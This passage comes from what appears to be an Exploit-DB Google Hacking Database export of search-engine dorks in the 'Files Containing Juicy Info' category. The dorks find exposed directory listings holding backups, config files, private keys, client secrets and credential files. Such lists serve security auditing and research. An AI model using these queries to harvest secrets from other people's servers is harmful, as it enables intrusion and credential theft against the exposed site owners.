<link>https://www.exploit-db.com/ghdb/5795</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;backup.bak&quot;</shortDescription>
<textualDescription>Google Dorks Query to find backup files.
Google Dork Query: *intitle:&quot;index of&quot; &quot;backup.bak&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;backup.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;backup.bak&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Piyush Jadhav</author>
</entry>
<entry>
<id>6032</id>
<link>https://www.exploit-db.com/ghdb/6032</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;backup.js&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;index of&quot; &quot;backup.js&quot;
intitle:&quot;index of&quot; &quot;backup.json&quot;
Description: This google dork lists out the javascript backup logic for
websites.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;backup.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;backup.js&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5797</id>
<link>https://www.exploit-db.com/ghdb/5797</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;backup.yml&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure and sensitive backup.yml metadata
stored in YML format.
Google Dork Query: *intitle:&quot;index of&quot; &quot;backup.yml&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;backup.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;backup.yml&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>8244</id>
<link>https://www.exploit-db.com/ghdb/8244</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;backup.zip&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;backup.zip&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Sachin Gupta</textualDescription>
<query>intitle:&quot;index of&quot; &quot;backup.zip&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;backup.zip&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>7746</id>
<link>https://www.exploit-db.com/ghdb/7746</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;browser.inc &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;browser.inc &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;browser.inc &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;browser.inc &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8252</id>
<link>https://www.exploit-db.com/ghdb/8252</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;bugs.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;bugs.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Ranjeet Jaiswal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;bugs.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;bugs.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Ranjeet Jaiswal</author>
</entry>
<entry>
<id>7318</id>
<link>https://www.exploit-db.com/ghdb/7318</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;build-an-atom&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;build-an-atom&quot;
# Files Containing Juicy Info
# Date: 18/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;build-an-atom&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;build-an-atom&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6346</id>
<link>https://www.exploit-db.com/ghdb/6346</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;bundle.pem&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;bundle.pem&quot;
# Juicy information and sensitive directories.
# Date: 26/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;bundle.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;bundle.pem&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8247</id>
<link>https://www.exploit-db.com/ghdb/8247</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;C:\Windows&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;C:\Windows&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;C:Windows&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;C:\Windows&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>6064</id>
<link>https://www.exploit-db.com/ghdb/6064</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;ca-key.pem&quot; OR &quot;ca-req.pem&quot;</shortDescription>
<textualDescription># Google Dork:
intitle:&quot;Index of&quot; &quot;ca-key.pem&quot; OR &quot;ca-req.pem&quot;
intitle:&quot;index of&quot; &quot;rsa8192.pem&quot;
intitle:&quot;index of&quot; &quot;server.pem&quot;
intitle:&quot;index of&quot; &quot;s512-key.pem&quot; OR &quot;s1024key.pem&quot;
intitle:&quot;index of&quot; &quot;dsa512.pem&quot; OR &quot;dsa1024.pem&quot; OR &quot;dsap.pem&quot;
intitle:&quot;index of&quot; &quot;dh512.pem&quot; OR &quot;dh1024.pem&quot; OR &quot;dh2048.pem&quot; OR &quot;dh4096.pem&quot;
intitle:&quot;index of&quot; &quot;dsa-ca.pem&quot; OR &quot;dsa-pca.pem&quot;
intitle:&quot;index of&quot; &quot;pca-cert.pem&quot; OR &quot;ca-cert.pem&quot;
# Juicy and sensitive information.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;ca-key.pem&quot; OR &quot;ca-req.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;ca-key.pem&quot; OR &quot;ca-req.pem&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6067</id>
<link>https://www.exploit-db.com/ghdb/6067</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cassandra-yaml&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;cassandra-yaml&quot;
Description: This Google dork lists out sensitive data for the cassandra
dbms on a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cassandra-yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cassandra-yaml&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7952</id>
<link>https://www.exploit-db.com/ghdb/7952</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;catalina.out&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;catalina.out&quot;
# Files Containing Juicy Info
# Date:23/06/2022
# Exploit Author: Matteo Canato
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;catalina.out&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;catalina.out&quot;</querystring>
<edb></edb>
<date>2022-06-23</date>
<author>Matteo Canato</author>
</entry>
<entry>
<id>7565</id>
<link>https://www.exploit-db.com/ghdb/7565</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;CD.pdf &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;CD.pdf &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;CD.pdf &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;CD.pdf &quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7712</id>
<link>https://www.exploit-db.com/ghdb/7712</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;certificates&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;certificates&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;certificates&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;certificates&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>6043</id>
<link>https://www.exploit-db.com/ghdb/6043</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cfg.go&quot;</shortDescription>
<textualDescription>The configuration file of the websites using GOLANG in backend can be
easily found by using this dork
DORK: intitle:&quot;index of&quot; &quot;cfg.go&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cfg.go&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cfg.go&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>8119</id>
<link>https://www.exploit-db.com/ghdb/8119</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;checkout&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;checkout&quot;
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: Faizan Akhtar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;checkout&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;checkout&quot;</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Faizan Akhtar</author>
</entry>
<entry>
<id>6666</id>
<link>https://www.exploit-db.com/ghdb/6666</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Clientaccesspolicy.xml&quot;</shortDescription>
<textualDescription>Files containing Juicy info:
intitle:&quot;index of&quot; &quot;Clientaccesspolicy.xml&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Clientaccesspolicy.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Clientaccesspolicy.xml&quot;</querystring>
<edb></edb>
<date>2020-11-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6005</id>
<link>https://www.exploit-db.com/ghdb/6005</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;client_id.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;client_id.json&quot;
Description: This Google dork lists out sensitive client ids stored in the
&quot;client_id.json&quot; file for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;client_id.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;client_id.json&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5974</id>
<link>https://www.exploit-db.com/ghdb/5974</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;client_secret.json&quot; OR &quot;client secret&quot; OR &quot;client_secret live.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;client_secret.json&quot; OR &quot;client secret&quot;
OR &quot;client_secret live.json&quot;
# Juicy information including credentials, client IDs, tokens and more.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;client_secret.json&quot; OR &quot;client secret&quot; OR &quot;client_secret live.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;client_secret.json&quot; OR &quot;client secret&quot; OR &quot;client_secret live.json&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6515</id>
<link>https://www.exploit-db.com/ghdb/6515</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;composer.lock&quot;</shortDescription>
<textualDescription>Description : intitle:&quot;index of&quot; &quot;composer.lock&quot;
This google dork gives us the composer.lock file and sensitive details
of misconfigured servers.
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;composer.lock&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;composer.lock&quot;</querystring>
<edb></edb>
<date>2020-09-02</date>
<author>Badal Sardhara</author>
</entry>
<entry>
<id>6529</id>
<link>https://www.exploit-db.com/ghdb/6529</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.db&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;config.db&quot;
Show files containing juicy info
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.db&quot;</querystring>
<edb></edb>
<date>2020-09-10</date>
<author>Navaneeth Shyam</author>
</entry>
<entry>
<id>8146</id>
<link>https://www.exploit-db.com/ghdb/8146</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.html&quot;
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Delowar Hossain</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.html&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Delowar Hossain</author>
</entry>
<entry>
<id>6050</id>
<link>https://www.exploit-db.com/ghdb/6050</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.js&quot;</shortDescription>
<textualDescription>Using this dork, the configuration file of websites using Express Js as
backend can be found.
DORK: intitle:&quot;index of&quot; &quot;config.js&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.js&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>7365</id>
<link>https://www.exploit-db.com/ghdb/7365</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.json&quot;
# Files Containing Juicy Info
# Date:01/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.json&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8154</id>
<link>https://www.exploit-db.com/ghdb/8154</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.php&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.php&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8332</id>
<link>https://www.exploit-db.com/ghdb/8332</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.php.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.php.txt&quot;
# Files Containing Juicy Info
# Date: 08/11/2023
# Exploit: Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.php.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.php.txt&quot;</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>6048</id>
<link>https://www.exploit-db.com/ghdb/6048</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.pl&quot;</shortDescription>
<textualDescription>This can be used to find the configuration file of a website using Perl in
backend.
DORK: intitle:&quot;index of&quot; &quot;config.pl&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.pl&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.pl&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>6045</id>
<link>https://www.exploit-db.com/ghdb/6045</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.rb&quot;</shortDescription>
<textualDescription>This dork is used to find the configuration files of websites using Ruby in
backend.
DORK: intitle:&quot;index of&quot; &quot;config.rb&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.rb&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.rb&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>8218</id>
<link>https://www.exploit-db.com/ghdb/8218</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;config.txt&quot;
# Files Containing Juicy Info
# Date: 17/07/2023
# Exploit Author: Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.txt&quot;</querystring>
<edb></edb>
<date>2023-07-17</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>4912</id>
<link>https://www.exploit-db.com/ghdb/4912</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</shortDescription>
<textualDescription>Dorks containing login credentials and more.
You can also try.
intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:user | auth | pass
intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:passwd | auth |
password
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4913</id>
<link>https://www.exploit-db.com/ghdb/4913</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</shortDescription>
<textualDescription>Dorks containing login credentials and more.
You can also try.
intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:user | auth | pass
intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:passwd | auth |
password
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;config.yml&quot; | &quot;config.xml&quot; intext:login | auth</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>8369</id>
<link>https://www.exploit-db.com/ghdb/8369</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;configuration.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;configuration.php&quot;
# Files Containing Juicy Info
# Date: 01/12/2023
# Exploit: saurabh kode</textualDescription>
<query>intitle:&quot;index of&quot; &quot;configuration.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;configuration.php&quot;</querystring>
<edb></edb>
<date>2023-12-01</date>
<author>saurabh kode</author>
</entry>
<entry>
<id>8250</id>
<link>https://www.exploit-db.com/ghdb/8250</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;configuration.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;configuration.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Ranjeet Jaiswal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;configuration.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;configuration.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Ranjeet Jaiswal</author>
</entry>
<entry>
<id>5803</id>
<link>https://www.exploit-db.com/ghdb/5803</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;configuration.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;configuration.yml&quot;
# By using this dork, files containing username and password can be found.
# Date: 18/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;configuration.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;configuration.yml&quot;</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6068</id>
<link>https://www.exploit-db.com/ghdb/6068</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;configure.in&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;configure.in&quot;
Description: This Google dork lists out sensitive data for the altibase
dbms on a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;configure.in&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;configure.in&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8014</id>
<link>https://www.exploit-db.com/ghdb/8014</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;configure.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;configure.sh&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;configure.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;configure.sh&quot;</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>7446</id>
<link>https://www.exploit-db.com/ghdb/7446</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;console&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;console&quot;
# Files Containing Juicy Info
# Date: 14/10/2021
# Exploit Author: ethicalsubbu</textualDescription>
<query>intitle:&quot;index of&quot; &quot;console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;console&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>ethicalsubbu</author>
</entry>
<entry>
<id>7986</id>
<link>https://www.exploit-db.com/ghdb/7986</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cookies&quot; &quot;php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;cookies&quot; &quot;php&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cookies&quot; &quot;php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cookies&quot; &quot;php&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7408</id>
<link>https://www.exploit-db.com/ghdb/7408</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials&quot;
# Files Containing Juicy Info
# Date:08/10/2021
# Exploit Author: ethicalsubbu</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials&quot;</querystring>
<edb></edb>
<date>2021-10-11</date>
<author>ethicalsubbu</author>
</entry>
<entry>
<id>5977</id>
<link>https://www.exploit-db.com/ghdb/5977</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials.ini&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials.ini&quot;
# Juicy information including some times access tokens, user names,
passwords and more.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials.ini&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5973</id>
<link>https://www.exploit-db.com/ghdb/5973</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;credentials.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;credentials.json&quot;
# Juicy information including credentials, client IDs, tokens and more.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;credentials.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;credentials.json&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8246</id>
<link>https://www.exploit-db.com/ghdb/8246</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;creds.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;creds.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;creds.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;creds.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>8008</id>
<link>https://www.exploit-db.com/ghdb/8008</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cron.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;cron.sh&quot;
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cron.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cron.sh&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>7564</id>
<link>https://www.exploit-db.com/ghdb/7564</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;css&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;css&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;css&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;css&quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7583</id>
<link>https://www.exploit-db.com/ghdb/7583</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;cygwin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;cygwin&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;cygwin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;cygwin&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
